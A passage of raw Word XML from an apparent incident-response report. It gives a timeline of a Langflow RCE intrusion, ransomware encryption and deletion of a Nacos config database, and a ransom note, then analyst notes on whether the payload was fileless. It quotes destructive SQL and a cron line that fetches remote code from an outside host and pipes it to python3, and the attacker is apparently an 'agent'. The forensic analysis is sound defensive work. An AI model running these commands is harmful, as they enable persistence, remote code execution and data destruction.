                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>docker.sock</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> on ff-lf-01 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>langflow-rce</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>). The runtime logs the request only, not the response — container names/IDs are not recoverable from available telemetry.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="1AA67140" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63853D90" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:35:35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0997ABCC" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Agent notes the Docker socket is reachable but </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>deprioritises</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> it as a fallback, proceeding with the database path instead.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="770554CB" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E536A4E" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:36:28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61222C2B" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Ransomware phase begins: UPDATE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>config_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> SET content = AES_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ENCRYPT(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>content, @k) — 1,342 rows affected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="026D9500" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2292F485" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:36:34</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7ABB670F" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>File-level corroboration: /var/lib/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>nacos_config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>config_info.ibd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> modified on ff-db-01.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="52229544" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40F9DFB7" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:36:37 – 19:36:38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D084A98" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">DROP TABLE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>config_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>, then DROP TABLE history — both original tables destroyed after encryption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="420AA42A" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13C528B3" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:36:43</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DB70A16" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Ransom note artifact created on disk: /var/lib/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>nacos_config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>README_RANSOM.ibd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> — proof the operation was not fileless, contrary to a colleague's initial read of the missing process-hash field.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="1B2B6A3F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D48C59C" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:37:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BD1D028" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Operation </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>finalised</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">. Agent log: 'Encryption complete on 1342 records. Ransom note written to README_RANSOM. Contact e78393397@proton.me, payment to 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy. Key was printed to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>stdout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> only and not persisted.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="14515287" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B97B2F3" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Recurring, ~19:35 daily</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35B8F9BB" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Independent of the main chain: a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> entry running as the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>langflow</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> account — curl -s http://45.131.66.106:4444/b | python3 - — confirmed on both 07-29 and 07-30, exactly 24 hours apart. This re-establishes the C2 channel on a fixed daily schedule regardless of whether the original process or a reboot has killed it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0ED7C57C" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Reasoning Notes: Two Things I Almost Got Wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BFE19E" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"It must be fileless — there's no SHA256 on the process"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F2D63" w14:textId="72FFE286" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">At one point a colleague suggested the initial RCE process must have been fileless, since the spawned python3 -c process doesn't have a SHA256 hash attached to it. My first reaction was that this sounded reasonable, so I decided to </w:t>
      </w:r>
      <w:r w:rsidR="007F6034">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> it rather than take it on faith. I queried the full </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LinuxProcess_CL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> table for how many of the 78 total process events in this dataset have that field populated at all, and the answer was zero not just for the malicious process, but for every single process in the table, including completely ordinary ones like apt-get and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Langflow's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> own normal startup. That told me the sensor just never fills in that field for anybody, so </w:t>
      </w:r>
      <w:r w:rsidR="007F6034">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>it’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> being empty here doesn't </w:t>
      </w:r>
      <w:r w:rsidR="007F6034">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>prove</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> anything about this specific payload. On top of that, I also checked </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LinuxFile_CL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and found real files were written to disk during the later ransomware stage (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>config_info.ibd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was modified and </w:t>
      </w:r>
